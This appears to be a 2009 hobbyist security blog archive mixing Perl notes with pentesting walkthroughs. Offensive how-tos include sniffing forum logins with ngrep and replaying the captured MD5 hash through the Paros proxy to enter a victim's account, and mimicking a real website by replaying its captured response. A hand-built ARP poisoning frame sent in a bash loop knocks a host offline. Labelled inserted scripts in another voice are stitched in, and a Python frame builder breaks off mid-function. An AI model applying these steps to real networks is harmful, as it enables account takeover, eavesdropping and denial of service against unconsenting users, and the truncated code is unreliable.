Tuesday, December 29, 2009

Perl - Notes

I have decided to learn Perl as I began to encounter many Perl scripts used for forensics and pentesting. I believe it would help me learn more if I write my own tools and understand the entire process a little better. This blog will house my notes and cheat sheets from day one.

Perl is a case sensitive language.

Starting line of every Perl program (the path must point at the perl interpreter on your system):
#!/usr/local/bin/perl

Printing text:
print 'hello world';

When printing a variable use double quotes instead of single quotes. Text within single quotes is printed as is, with no variable interpolation.
print "$var1";

Declare and assign a variable. This kind of variable is known as a scalar variable. Scalar variables are simple variables containing only one element: a string, a number, or a reference. Strings may contain any symbol, letter, or number. Numbers may be integers, decimal values, or values with exponents.
$var1 = 1;
$var1 = 'hello world';

Declare an Array:
@food = ("rice", "eggs", "orange");

Accessing a single element of an array (indices start at 0):
print "$food[1]"; # prints eggs with reference to the above example

Finding the length of an array just involves assigning the array to a scalar variable (an array evaluated in scalar context gives its element count). For instance:
@food = ("rice", "eggs", "orange");
$count = @food;
print "$count"; # this would output '3'

Add and Remove elements from an array
  • push() - adds an element to the end of an array.
  • unshift() - adds an element to the beginning of an array.
  • pop() - removes the last element of an array.
  • shift() - removes the first element of an array.


Concatenate two string variables with the dot operator:
print $string . $linebreak;

Opening a file and printing its contents like the unix program 'cat':
$file_path = '/root/myfile.txt';
open(FILE1, '<', $file_path) or die "cannot open $file_path: $!";
@mydata = <FILE1>;   # read every line of the file into the array
close(FILE1);
print @mydata;

Formatting Characters
http://www.tizag.com/perlT/perlstrings.php

Regular Expression Cheat Sheets
http://www.cs.tut.fi/~jkorpela/perl/regexp.html

Using substrings.
To use substr() to grab a substring, you need to give it both a string variable to pick something out of and an offset (which starts at 0). The first argument of substr() is the string we want to take something from and the second argument is the offset, i.e. where we want to start. substr() can take a third and fourth argument, the third being the length and the fourth being a replacement string; with four arguments the matched portion of the original variable is replaced in place.

$mystr = "hello world";

$mystr1 = substr($mystr, 2);
$mystr2 = substr($mystr, 2, 3);
$mystr3 = substr($mystr, 6, 5, "there");

print "$mystr1"; # this would print 'llo world'
print "$mystr2"; # this would print 'llo'
print "$mystr";  # this would print 'hello there'. Note we are printing $mystr and not $mystr3 here

Transforming strings into arrays with the split function:
$mystr = 'the/boy/walked/fast';
@myarr = split('/', $mystr);
print "@myarr"; # this prints 'the boy walked fast'

Likewise we can join the elements of an array into a single scalar string.
@array = ("David","Larry","Roger","Ken","Michael","Tom");
@array2 = qw(Pizza Steak Chicken Burgers);

@array = ("a") x 10;
print "@array"; # would print the character 'a' 10 times

# join them together
$firststring = join(", ", @array);
$secondstring = join(" ", @array2);

Sorting arrays
@myarr = ("chicken" , "eggs", "apples");
@myarr = sort(@myarr);

Conditions and loops are similar in syntax to C.
[While loop]
$a = <STDIN>; # read input from keyboard
chomp($a);    # strip the trailing newline, otherwise "kill\n" never equals "kill"
while ($a ne "kill")
{
print "wrong";
$a = <STDIN>; # read input from keyboard
chomp($a);
}

print "Correct";

[For loop]
for ($x = 0; $x < 10; $x++) # the upper bound is not legible in the original; 10 is a placeholder
{
print "$x\n";
}

[do ... while loop]
$a = 1;
do
{
print $a;
$a++;
}
while ($a < 10); # the condition is not legible in the original; 10 is a placeholder

[If statement]
$a = "hello";
if (length($a) > 3)
{
print "more than 3 characters";
}

[Regular expression match] using =~ or !~
$word = "Hello my good friend";
if ($word =~ /my/)
{
print "found the word: my";
exit;
}
print "Not found";

The opposite of the above would be to use '!~' instead of '=~'.

Substitution/replacement:
$word = "canada states";
$word =~ s/canada/United/;   # replaces only the first occurrence of the string canada with United
$word =~ s/canada/United/g;  # the trailing g (global) replaces all occurrences of the string
$word =~ s/[Hh][Oo][Pp][Ee]/Hope/g; # character classes make this match regardless of case; the next example is a better way to do this
$word =~ s/CanADa/Canada/gi; # the i modifier ignores case

$search = "the";
s/$search/xxx/g;

will replace every occurrence of 'the' with 'xxx' (in $_, the default variable, since no =~ target is given). If you want to replace every occurrence of 'there' you cannot write s/$searchre/xxx/ because $searchre would be interpolated as a variable name. Instead put the variable name in curly braces:

$search = "the";
s/${search}re/xxx/;

Character Translation
$a = "abc";
$a =~ tr/abc/boy/; # translates a to b, b to o and c to y
print $a; # prints boy

$count = ($a =~ tr/*/*/); # tr returns the number of characters matched, so this counts the asterisks in $a and stores that in $count

Inside tr/// a dash still means "between". This statement converts $_ to upper case:
tr/a-z/A-Z/;

Sorting arrays of words
@array1 = ("orange","yellow","Red","green","blue");
@sorted = sort(@array1); # sorts in string (ASCII) order, so the capitalised "Red" comes before the lower-case words
@sorted_reversed = sort { $b cmp $a } @array1; # sorts in reverse order

Sorting arrays of numbers
@array1 = (5,7,2,4,1,8,6);
@sorted = sort(@array1); # the default sort compares as strings; use sort { $a <=> $b } @array1 for numeric order
@sorted_reversed = sort { $b <=> $a } @array1; # numeric sort in reverse order

Key functions to remember
my $position = index($longString, $shortstring); # returns the position of the first occurrence of $shortstring in $longString, or -1 if it is not found
splice(@myarr, 2, 3); # removes three elements starting at index 2 (the third element, since indices start at 0) and returns them; on a 7-element array 4 elements remain
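The following script is an added example, not part of the original notes: it puts the constructs above (file reading, split, substr, =~ matching, tr counting, a numeric sort block and join) to work on a few constructed sshd-style log lines to rank source addresses by failed logins. The log path /tmp/sample_auth.log and the log lines are assumptions made for the example.

```perl
#!/usr/bin/perl
# Added example (not from the original notes). Triage of constructed
# sshd log lines using the constructs covered in the Perl notes.
use strict;
use warnings;

# Constructed sample log, written to a temp file so the open/read/close
# pattern from the notes is exercised. Path is an assumption.
my $log_path = "/tmp/sample_auth.log";
open(my $out, '>', $log_path) or die "cannot write $log_path: $!";
print $out <<'END_LOG';
Dec 29 10:01:02 host sshd[2101]: Failed password for invalid user admin from 10.0.0.7 port 51234 ssh2
Dec 29 10:01:05 host sshd[2101]: Failed password for root from 10.0.0.7 port 51235 ssh2
Dec 29 10:02:11 host sshd[2108]: Accepted publickey for user1 from 10.0.0.2 port 40010 ssh2
Dec 29 10:03:40 host sshd[2112]: Failed password for root from 192.168.1.103 port 33001 ssh2
Dec 29 10:03:41 host sshd[2112]: Failed password for root from 10.0.0.7 port 51236 ssh2
Dec 29 10:04:10 host sshd[2115]: Accepted password for root from 10.0.0.7 port 51240 ssh2
END_LOG
close($out);

# Read the whole file into an array, like the 'cat' example in the notes.
open(my $in, '<', $log_path) or die "cannot open $log_path: $!";
my @lines = <$in>;
close($in);

my %failed;      # source IP -> number of failed logins
my %accepted;    # source IP -> number of accepted logins
my %first_seen;  # source IP -> timestamp of its first failure

foreach my $line (@lines) {
    chomp($line);
    # substr(): the first 15 characters of a syslog line are the timestamp.
    my $timestamp = substr($line, 0, 15);
    # split(): whitespace-separated fields; field 4 is the process tag.
    my @fields = split(' ', $line);
    next unless @fields > 4 && $fields[4] =~ /^sshd/;

    # =~ with a capture group pulls out the source address.
    if ($line =~ /Failed password for .* from (\S+) port/) {
        my $ip = $1;
        # tr with the same list on both sides counts characters: an IPv4
        # address must contain exactly three dots.
        my $dots = ($ip =~ tr/././);
        next unless $dots == 3;
        $failed{$ip}++;
        $first_seen{$ip} = $timestamp unless exists $first_seen{$ip};
    } elsif ($line =~ /Accepted \w+ for (\S+) from (\S+) port/) {
        $accepted{$2}++;
    }
}

# Numeric sort block (<=>) ranks addresses by failure count, highest first.
my @ranked = sort { $failed{$b} <=> $failed{$a} } keys %failed;
foreach my $ip (@ranked) {
    print join(" ", $ip, "failed logins:", $failed{$ip},
               "first seen:", $first_seen{$ip}), "\n";
}

# An address that failed repeatedly and then got in is worth a closer look.
foreach my $ip (sort keys %accepted) {
    my $n = $failed{$ip} || 0;
    print "$ip: $n failures followed by an accepted login\n" if $n >= 3;
}
```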

Monday, December 21, 2009

pcapcat, dumping the contents of a tcp stream

Pcapcat is a simple Perl script that can dump the contents of a TCP stream. The script gives an index of the TCP streams it identifies (by default it shows only new TCP connection streams, those initiated by SYN packets, but you have the option to show already established connections as well) and you use this index to identify which stream you would like to dump.

usage:
# perl pcapcat -r pcap_file // displays new connection streams. Already established connections would be ignored

# perl pcapcat -r pcap_file -a // '-a' displays already established connections. Useful in many cases where the initial communication had already commenced like a conversation.

# perl pcapcat -h // gives you a listing of all the options used with pcapcat

Resources/Good reading:
http://blog.kiddaland.net/2009/09/network-forensics-puzzle/

smtpcat, parsing emails from a pcap file

I learned of the tool from a forensic contest blog I've been following for a while now. This tool came about when a challenge was posed to determine the contents of an email from a pcap file. I've posted the solutions to this contest in an earlier blog entry (still have to update the part on getting the password) but my methods were not very automated and as easy as one might want things to be. A Perl script, Smtpcat, came about to resolve this issue. From the author, Amar Yousif,
"I wrote smtpcat which will loop through a pcap file and identify all of the smtp conversations in it. Smtpcat dives deep into the payload and identifies the sender, receiver, date, subject, and optionally the AuthSMTP decoded password. The tool also has the ability to dump the payload of any smtp message as an eml file that can be further opened via outlook express for example."

This tool definitely would make my life easier when parsing through network captures for email messages and their contents. I'm happy I did things using a more manual procedure; it just goes to show that I understood what I was doing.

usage:
# perl smtpcat -r pcap_file -p // '-r' reads the pcap and '-p' tells smtpcat to decode the smtp password

[1] 192.168.1.159:1036 -> 64.12.102.142:587
[1] sneakyg33k@aol.com -> sec558@gmail.com Sat, 10 Oct 2009 07:35:30 -0600
[1] SUBJ: lunch next week
[1] PASS:558r00lz

[2] 192.168.1.159:1038 -> 64.12.102.142:587
[2] sneakyg33k@aol.com -> mistersecretx@aol.com Sat, 10 Oct 2009 07:38:10 -0600
[2] SUBJ: rendezvous
[2] PASS:558r00lz

The above shows two email conversations being sent. Smtpcat identifies the sender and recipient as well as the smtp password.

# perl smtpcat -r pcap_file -p -d 2 -w message.eml // '-d 2' dumps the content of the smtp message from index 2 (index 2 was identified with the first command output above). '-w' writes the contents of the smtp message to a file

You can then open the message.eml file in outlook express to get the email body and possible attachments.

For more commands type: # perl smtpcat -h
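As an added example (not smtpcat's own code, and not from the original post), here is a minimal Perl parser that does on one reassembled SMTP session what the post describes smtpcat doing across a pcap: it walks the client's commands and the DATA section and pulls out sender, recipient, date and subject in the same "[index] ..." layout. The transcript is constructed sample data, the input is already-reassembled text rather than a pcap, and password decoding is left out.

```perl
#!/usr/bin/perl
# Added example, not part of smtpcat. Extracts the fields smtpcat reports
# (sender, recipient, date, subject) from a constructed SMTP transcript.
use strict;
use warnings;

# Constructed transcript of one SMTP submission. "C:" lines are sent by
# the client, "S:" lines by the server.
my @stream = (
    'S: 220 mail.example.test ESMTP',
    'C: EHLO client.example.test',
    'S: 250 OK',
    'C: MAIL FROM:<alice@example.test>',
    'S: 250 OK',
    'C: RCPT TO:<bob@example.test>',
    'S: 250 OK',
    'C: DATA',
    'S: 354 End data with <CR><LF>.<CR><LF>',
    'C: From: alice@example.test',
    'C: To: bob@example.test',
    'C: Date: Sat, 10 Oct 2009 07:35:30 -0600',
    'C: Subject: lunch next week',
    'C: ',
    'C: Want to grab lunch on Tuesday?',
    'C: .',
    'S: 250 OK queued',
    'C: QUIT',
);

# Parse "C:"/"S:" prefixed lines into a hash: envelope sender, list of
# recipients, Date and Subject headers, and the raw message (the .eml).
sub parse_smtp_session {
    my @lines = @_;
    my %msg = (from => '', to => [], date => '', subject => '', raw => '');
    my $in_data = 0;
    foreach my $entry (@lines) {
        next unless $entry =~ /^C: ?(.*)$/;   # only the client carries the message
        my $line = $1;
        if ($in_data) {
            if ($line eq '.') { $in_data = 0; next; }   # end-of-data marker
            $msg{date}    = $1 if $line =~ /^Date:\s*(.*)$/i;
            $msg{subject} = $1 if $line =~ /^Subject:\s*(.*)$/i;
            $msg{raw} .= "$line\n";                     # headers plus body
            next;
        }
        if    ($line =~ /^MAIL FROM:\s*<?([^>\s]+)>?/i) { $msg{from} = $1; }
        elsif ($line =~ /^RCPT TO:\s*<?([^>\s]+)>?/i)   { push @{ $msg{to} }, $1; }
        elsif ($line =~ /^DATA$/i)                      { $in_data = 1; }
    }
    return \%msg;
}

my $m   = parse_smtp_session(@stream);
my $idx = 1;   # a real tool would number each session found in the capture
print "[$idx] $m->{from} -> ", join(",", @{ $m->{to} }), " $m->{date}\n";
print "[$idx] SUBJ: $m->{subject}\n";

# Equivalent of dumping the message to an .eml file (path is an assumption).
open(my $eml, '>', "/tmp/message_$idx.eml") or die "cannot write eml: $!";
print $eml $m->{raw};
close($eml);
```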

Resources/Good reading:
http://forensicscontest.com/contest02/Finalists/Amar_Yousif/narrative.txt
http://www.yousicurity.com



Wednesday, December 16, 2009

Replaying captured web traffic using ncat

If you are not familiar with the whole idea of replaying a packet then you should get to googling. The basic idea behind this methodology is to sniff and capture interesting traffic from either the client or server and then replay it. By doing this you can mimic a certain client's request or a server's response and vice versa. In my demo, I will demonstrate how I was able to capture a user's 'GET' request for a website (in my demo, www.ask.com) and the server's response, and use the captured response to replay the same data that www.ask.com responds with to the client's request. This has the effect of mimicking a site and in some ways tricking a user into believing they are at www.ask.com when they are actually connected to your machine. Not as fun as gaining a shell, but with your imagination you can come up with ideas for interesting packets to replay that can form the basis for some more fun stuff.

Steps:
  1. Use Wireshark to capture packets of a user making a request for www.ask.com in their web browser.
  2. Apply a display filter for that stream and filter it to show only the server's response. Save the data of the server's response to a file.
  3. Start up ncat to replay the saved response (data):
    # ncat --send-only -l 80 < response
  4. Use a web browser to connect to your ncat 'fake' webserver.
If you practice this on a few websites you're gonna notice that not all of the contents of the page might be displayed. If you've written HTML before, you should already know why this is so. If you wanna get crafty and edit the packets to change some directory paths, that should get things up and running, but to me it's not worth the effort since I'm no criminal. YES, if you actually took the time to modify the response in such a way that all of the original website's content shows, then you more than likely have some evil intentions in mind.

Video demonstration...

Untitled from aerokid240 on Vimeo.

Thursday, December 10, 2009

SSH public and private key authentication

If you have played with ssh before, you should be familiar with logging in to the ssh server with your password/passphrase. There is nothing wrong with this method of authentication as long as you have a complex password that is extremely hard to guess. However there is a more advanced method of authentication used by many professional organizations and businesses and across the internet, known as public key authentication. This system utilizes two keys: a public key, known to everyone, that is used for encryption, and a private or secret key known only to the recipient of the message. In ssh the private key is used only for authentication; all subsequent communication uses a negotiated symmetric key, a key common to both the sender and receiver of the message that is used to encrypt and decrypt it.

SSH is commonly used for remote administration of machines and is very common in the unix environment. As administrators we want to automate most of our tasks remotely over ssh, but the problem that arises is the password prompt. How can we automate a remote task if the machine we are logging into is gonna ask for a password every time we log on? The answer is to utilize the public and private key authentication method. You specify a private key to be used to authenticate to the remote machine. The remote machine must have the matching public key under the account you are logging in as. Once the public and private key pair is in place, access is granted automatically without the need for a password/passphrase.

[tools]
sshd [linux]
Putty [windows]
Puttygen [windows]

Step 1. Using puttygen, generate a 1024 bit RSA key pair and save the public and private key portions to a USB key (mykey.pub and mykey.ppk).

Step 2. Copy the public key (mykey.pub) to the unix machine into the "/root/.ssh/" folder.

Step 3. Convert the puttygen public key to OpenSSH format.
# ssh-keygen -i -f /root/.ssh/mykey.pub > mykey2.pub

Step 4. Append the contents of the converted public key to a file called authorized_keys (or authorized_keys2 on older servers). sshd ignores this file unless the .ssh directory and authorized_keys are writable only by their owner (modes 700 and 600 respectively), so check the permissions if the key is not accepted.
# touch authorized_keys
# cat mykey2.pub >> authorized_keys

Step 5. Using putty, enter root@10.0.0.1, assuming 10.0.0.1 is the remote host's IP address.

Step 6. Under the 'Connection' section in putty, go to the 'SSH' sub section, then 'Auth'. Browse for your private key (mykey.ppk), then click Open.

If all went well you should be granted access to the root account without having to enter a password. If you were using a Linux client, this could have been automated using bash scripts; all that is required is to place your private key in the .ssh folder of your local home directory, i.e. /home/user1/.ssh/

Resources/Good reading:
http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
http://hkn.eecs.berkeley.edu/~dhsu/ssh_public_key_howto.html

Wednesday, December 9, 2009

Video Demo of me exploiting Internet explorer 6 on XP SP2

It cannot be stressed enough why you should always try to keep your software patched and up to date. A lot of individuals understand that updates can add new features and fix some bugs but don't have a clue about the security aspects. You may have come across the term 'exploit' before but don't really quite grasp the concept. An exploit is special code that attempts to capitalize on what are known as software vulnerabilities, and by capitalize I mean do something that is of benefit to the attacker. In the hacker culture, most of the time we would want to exploit software in hopes of gaining "shell" access, which is basically a command prompt environment on the exploited machine. Picture being at a Windows machine at the command line and the amount of power you have in your arsenal. You can create user accounts, kill processes, create and delete files, etc. This is what the hacker hopes to gain from his exploit: an environment where he can command your machine via a shell, i.e. a command prompt, from his own attacking machine.

In my video demonstration, I'm gonna exploit a vulnerability in IE 6 on an XP SP2 machine. The attacker sets up his machine as a special type of web server awaiting a user to connect to it using Internet Explorer (you can force a user to connect to your machine via DNS spoofing on a LAN, see my earlier post on dnsspoof). When the victim browses to the attacker's web page (or was forced onto the page by the attacker) an exploit is run against the victim's browser, and if the exploit was successful you get a command prompt/shell of the victim's machine on the attacking machine. From here the attacker can take command of the victim's computer and is only limited by his imagination.

[Tools used]
Metasploit-v3.4


Internet Explorer 6 exploit from aerokid240 on Vimeo.


Tuesday, December 8, 2009

New Video demos

[Breaking into facebook and gmail without a username and password]
***** http://aerokid240.blogspot.com/2009/11/ferret-and-hamster-20-sidejacking.html

[Eavesdropping on your neighbours' MSN conversations]
*****http://aerokid240.blogspot.com/2009/11/msgsnarf.html

[Exploiting IE6 on XP SP2 machine to gain shell access]
*****http://aerokid240.blogspot.com/2009/12/video-demo-of-me-exploiting-internet.html

Monday, December 7, 2009

Video illustrations on the way...

I know some of the demos may leave you a bit puzzled at times, but some of the concepts can't be adopted overnight. And as you would have noticed, most of the demos use Linux quite heavily, adding to the frustration for most Windows users. The good news today is I just got an account with www.vimeo.com so now I can add video illustrations to some of my blog posts. I'm gonna go back to some of my previous posts and add some video illustrations to them. If there is any request for a visual illustration of any previous post, just leave a comment or shoot me an email.

Saturday, December 5, 2009

How you can steal log-on credentials from forum based websites using Paros and ngrep

As you can imagine, ngrep would be our sniffer that parses out the necessary information we are looking for. But what is Paros and what is it gonna be used for? Paros is a proxy, but unlike traditional proxies it allows you to modify certain parameters in HTTP request and reply packets. How we are gonna use it in our demo is to modify the password field of an HTTP POST to input the appropriate password. Confused? Well just follow my demo and hopefully all will be clear.

First we use ngrep (look back at my earlier post for info on using ngrep) to sniff out the important information when the user logs in. Note that sometimes the passwords may be in cleartext or in an MD5 hash. If the password is in MD5 hash form, we can use online resources to crack them, or not even bother cracking them. Why not just use the hash to log in? Is it possible? Yes.. and that's what I'll be showing you.

[Note: you would be required to perform some form of man in the middle attack in order to be able to sniff the packets]

Setting up ngrep to sniff:
# ngrep -W byline -d eth0 -q "POST" port 80 // we are sniffing port 80 for the string 'POST', i.e. when a user hits the login button a POST is sent to the logon server. '-W byline' makes the output to standard out more readable.

On some other machine [victim machine], log in to your favorite forum website and pay attention to ngrep's output. It should have captured the POST packet with your username and password. Like I said earlier, sometimes the password is not in plain text. Sometimes it would be an MD5 hash. Let's see how we can use this hash with Paros proxy.

Let's fire up Paros on the attacking machine.
# java -jar paros.jar

On the attacking machine, open up your web browser and change its network settings to use the proxy 127.0.0.1 on port 8080. Try browsing to a website to confirm the proxy works. Paros should now have captured traffic.

In the "Trap" tab select "trap request". Now navigate to the same forum website that you've captured info from. On the login form, put in the username that you captured and some bogus password and hit the submit button. Notice that the web page is stuck loading and Paros is blinking. Let's investigate. Paros has captured the request and is awaiting some sort of feedback from you. At this point you can see that Paros has captured the login request. The username is the right one you typed in and the password is in some hashed MD5 form. It's actually the MD5 sum of the bogus password you entered. What we wanna do is take the MD5 hash that we captured from the ngrep output and input it in the Paros parameter screen (easier to view in tabular view). Note you are gonna need to enter it in two places, "vb_login_md5password" and "vb_login_md5password_utf". After you've done this, deselect the trap request option and hit the continue button. Guess what has happened............... You've now logged into your victim's account.

To help with my illustration above, here's a video illustrating the simplicity of the attack. Note that the user uses a different sniffer to sniff on the wire.

[video]: http://www.securitytube.net/How-Secure-is-your-Forum-Login-video.aspx

Resources/Good reading:
http://www.securitytube.net/How-Secure-is-your-Forum-Login-video.aspx

Using netcat to stream music with mpg123

Like my previous post, I used netcat as a simple one page webserver, basically having netcat listen on port 80 and send an HTML file to anything that connects to port 80. Simple enough. This post shows how we can use the same concept: listen on a port and send an mp3 over the network to connecting clients. mpg123 is a command line utility that plays music from the command line. You can see how netcat and mpg123 are used together to stream music across the network.

Demo:
[server]10.0.0.1
[client]10.0.0.2

[server] # cat music_file.mp3 | nc -l -p 4444 // listens on port 4444 and cats the contents of the mp3 file across the network

[client] # nc 10.0.0.1 4444 | mpg123 - // connects to the server on port 4444 and plays whatever data comes through the connection


Resources/Good reading:
http://www.hak5.org/episodes/episode-514

Thursday, December 3, 2009

Using netcat and ncat as simple webservers

Nothing too fancy here, just an illustration of how versatile the netcat tool is/can be. We all know netcat to be a simple backdoor utility that can be used for simple chats and file transfers. Well, to add to its long list of possibilities and features, I am going to set up a one page webserver. Useful if you need to set up a notification about your page being down for maintenance. In its basic form, we set up a netcat listener on port 80 then pipe or push a file into the connection when clients connect.

[for netcat]
# while true; do nc -l -p 80 -q 1 < index.html; done
[for ncat]
# while true; do ncat -l 80 --send-only < index.html; done

Note: we use a while loop so that a new listener is started after each request and further requests are accepted. Using "-k" (keep open) in ncat would not work in this instance because "--send-only" terminates the connection once all data has been sent to the client.

References/Good reading:
http://www.terminally-incoherent.com/blog/2007/08/07/few-useful-netcat-tricks/
http://www.stearns.org/doc/nc-intro.current.html

Another example where physical access always gets you in (using chntpw)

chntpw is a small Linux utility that is used to (re)set the password of any valid local account on a Windows NT, 2000 or XP machine (not tried on Vista and 7). Knowledge of the old password for an account is not needed to set a new one. The tool works by modifying encrypted data in the registry's SAM file. This utility works with syskey and includes the option to turn it off.

The target Windows machine needs to be offline, meaning the installed OS is not loaded. You're gonna need a bootable Linux distribution (CD or bootable USB works) with the chntpw package installed.

Steps:
  1. Mount the NTFS drive. It needs to be mounted read/write, not read-only, using either of:
    # mount -t ntfs-3g /dev/sda1 /mnt/disk1
    # ntfsmount /dev/sda1 /mnt/disk1 -o default_permissions
  2. Navigate to the location of the SAM file, typically \windows\system32\config
    # cd /mnt/disk1/WINDOWS/System32/Config
  3. Make a backup of the SAM, security and system files.
    # cp SAM SAM.bak && cp security security.bak && cp system system.bak
  4. Run chntpw in interactive mode with the SAM, security and system files as arguments.
    # chntpw -i SAM security system
  5. You should be presented with an interactive screen where you can list the local users and change or reset their passwords.
    NOTE: Changing a user's password here is known to be less reliable than simply resetting/blanking it. I would suggest just blanking the password if applicable, then changing it from within Windows once you get in. Use an "*" to blank a password in chntpw's interactive screens.
  6. Remember to save your changes before you exit.
  7. Reboot the computer and log in to Windows to see if your hack worked (more than likely it did).
For more chntpw options (although you probably won't need anything else), type:
# chntpw -h

chntpw help and usage:

chntpw version 0.99.3 040818, (c) Petter N Hagen
chntpw: change password of a user in a NT SAM file, or invoke registry editor.
chntpw [OPTIONS] [systemfile] [securityfile] [otherreghive] [...]
-h This message
-u Username to change, Administrator is default
-l list all users in SAM file
-i Interactive. List users (as -l) then ask for username to change
-e Registry editor. Now with full write support!
-d Enter buffer debugger instead (hex editor),
-t Trace. Show hexdump of structs/segments. (deprecated debug function)
-v Be a little more verbose (for debuging)
-L Write names of changed files to /tmp/changed
-N No allocation mode. Only (old style) same length overwrites possible
See readme file on how to extract/read/write the NT's SAM file
if it's on an NTFS partition!
Source/binary freely distributable. See README/COPYING for details
NOTE: This program is somewhat hackish! You are on your own!

Resources/Good reading:
http://home.eunet.no/~pnordahl/ntpasswd/index.html
http://linuxbasement.com/content/changing-nt-passwords-with-linux-and-chntpw
http://rhadimas.wordpress.com/2006/10/15/reset-windows-password-w-knoppix/

Wednesday, December 2, 2009

Sniffit, packet sniffer and monitoring tool

Sniffit is a nice little sniffer that gives you the ability to zoom in on already established connections and view the data. It's mainly useful in MITM situations. Picture being in the middle of a telnet session or in the middle of a netcat chat. With sniffit, you can watch the communications going back and forth and possibly gain knowledge of confidential info.

To run sniffit:
# sniffit -i -F eth0 // opens sniffit in [-i]nteractive mode and [-F]orces the program to listen on the specified interface

To listen in on (zoom into) a connection just hit the Enter key. To get out of it, hit the "q" key. For some useful statistics hit the "n" key. To completely close the program hit the "q" key again.

Tuesday, December 1, 2009

Steganography (using steghide)

Steganography is the ability to hide data in plain sight. Messages are hidden in such a way that no one other than the sender and the intended recipient should be aware of their existence. What that means is the picture that someone sent to you and a few other people could possibly contain a hidden message, and possibly only one or two of the recipients know of its existence.

Steghide is a steganography program that has the ability to hide data in various image and audio file formats. The embedded data can be compressed and encrypted. Some supported file formats are JPEG, BMP, WAV and AU. There are no restrictions on the format of the secret data. It runs on both Windows and Linux.

Demo:
Create a text file and type something in it that you wish to hide [name it confidential.txt].

Next, locate a jpg or bmp file that you would like to use as the cover file to hide the text file in.
When you have your image file, run this command to see its storage capacity:
# steghide info image_file.jpg

Next let's embed our confidential.txt in the image file. By default, the embedded data is encrypted with Rijndael (AES, 128-bit) in CBC mode. Note you will have to enter a password.
# steghide embed -cf image_file.jpg -ef confidential.txt

To extract the file run the following command then enter the password:
# steghide extract -sf image_file.jpg

That's all there is to it.

[options]
"-cf": cover file to use
"-ef": file we want to hide
"-sf": the name of the stego file that we have created
"-e": specify the encryption to use if the default doesn't suit you

To find out about the other encryption algorithms that you can use type:
# steghide encinfo

Resources/Good reading:
http://steghide.sourceforge.net/
http://en.wikipedia.org/wiki/Steganography
http://linux.die.net/man/1/steghide

Monday, November 30, 2009

Manually modifying a network packet, the way the pros do it

In my previous post, I spoke about using ettercap and its plugin "isolate" to take down a host on a network. It poisons the ARP cache of the victim's machine into linking its own MAC address to the router's/gateway's IP address, thus achieving a complete denial of service (google: DoS attack). In this post, I'm gonna discuss how you can perform such an attack using a more manual method: manually constructing the malicious packet.

File2cable is a simple program that sends a file as a raw ethernet frame over a specified interface.

Hexedit is a simple hex editor for unix machines.

In this demo, we are going to isolate a host, just like we did with ettercap and its isolate plugin.

The first thing you want to do is use Wireshark to capture an "ARP reply" packet. When you have that packet (to use as a prototype), export the frame/packet bytes to a file (for this example, I'll name the file "arp_reply"). Open the file with hexedit (# hexedit -b arp_reply). Now, the idea behind modifying the packet is knowing what to change. You want to have Wireshark and hexedit open side by side so you are watching both screens. In Wireshark pay attention to the hex dump pane at the bottom. In the pane above it select the layer 2 frame (Ethernet II) and notice that a certain number of bytes are highlighted in the hex dump below. The highlighted bytes are the representation of the Ethernet frame. Now within that Ethernet frame, expand the tree view and select Destination. Notice the selection in the hex dump now. Anything familiar about the hex bytes selected? It's the destination MAC address. You can select other items in the Ethernet II portion and notice the different hex representations of your selections. Now we can change these bytes using hexedit. We use Wireshark as a reference so we know which hex bytes to change in hexedit. This is the main idea of manually altering a packet.

Now I'm going to tell you everything that you need to change using hexedit. Please note that we are in the hex realm of things: the changes you are going to make are the hex representations of certain values (note that the MAC address is already in hex, so no conversion is necessary).

[Ethernet II]
Destination: Set this to the MAC address of the target host (the victim whose ARP table we are going to poison)
Source: Set this to your network interface's MAC address (put the real thing, otherwise it won't work)

[ARP]
Sender MAC address: You must set this to the target host's own MAC address (we poison his cache here)
Sender IP address: We set this to the router/gateway's IP address, in hex of course
Target MAC address: We set this to the target's MAC
Target IP address: We set this to the target's IP address


Press ctrl+x then hit the Enter key to save the packet you just modified and exit. Now to test this attack, on your victim's machine pull up a command prompt and check the ARP cache (arp -a). Make a note of the router's IP to MAC address mapping. Next send our packet/file onto the wire/network with file2cable, which can be used on wireless networks as well (# file2cable -i eth0 -f arp_reply). Now go check the ARP cache on the victim's machine. See the difference? If you try browsing to websites and things don't work, then it worked and this machine has been taken down.

Since a computer's ARP cache normally refreshes around every 5 minutes, our attack won't be very long term. What we can do is write a script that sends our malicious packet every few seconds. We use seconds instead of minutes because the router can send an ARP request to the victim, and when the victim responds accordingly, the victim naturally learns the MAC to IP mapping of the ARP requester. We can write a script as follows:

#!/bin/bash
# resend the poisoned ARP reply every 10 seconds until interrupted with Ctrl+C
while true; do
    file2cable -i eth0 -f arp_reply
    sleep 10
done

The above script will loop the file2cable commands every 10 seconds.
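To make the byte layout concrete, here is a small Python script written for this post (it is not taken from Wireshark, hexedit or file2cable) that builds the same 42-byte Ethernet II + ARP reply from the field values above, and can decode a frame back into fields so you can compare it against Wireshark's dissection. The MAC and IP addresses in the __main__ block are made-up examples; the output file name arp_reply matches the walkthrough, so the result can be handed straight to file2cable instead of editing a captured prototype in hexedit.

```python
import struct

ETH_P_ARP = 0x0806   # EtherType for ARP
ARP_REPLY = 2        # ARP opcode: 1 = request, 2 = reply


def mac_bytes(mac):
    """'aa:bb:cc:dd:ee:ff' -> the 6 raw bytes you would otherwise type into hexedit."""
    parts = mac.split(":")
    if len(parts) != 6:
        raise ValueError("bad MAC address: %r" % mac)
    return bytes(int(p, 16) for p in parts)


def ip_bytes(ip):
    """'192.168.1.1' -> 4 raw bytes (dotted decimal converted to hex)."""
    parts = [int(p) for p in ip.split(".")]
    if len(parts) != 4 or any(not 0 <= p <= 255 for p in parts):
        raise ValueError("bad IP address: %r" % ip)
    return bytes(parts)


def build_arp_reply(dst_mac, src_mac, sender_mac, sender_ip, target_mac, target_ip):
    """Serialise an Ethernet II header followed by an ARP reply (42 bytes total)."""
    # Ethernet II: destination(6) source(6) ethertype(2)
    eth = mac_bytes(dst_mac) + mac_bytes(src_mac) + struct.pack("!H", ETH_P_ARP)
    # ARP: htype(2)=Ethernet ptype(2)=IPv4 hlen(1)=6 plen(1)=4 opcode(2)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def poison_frame(victim_mac, attacker_mac, gateway_ip, victim_ip):
    """Exactly the field assignment from the walkthrough: tell the victim that the
    gateway's IP lives at the victim's own MAC, so its internet traffic goes nowhere."""
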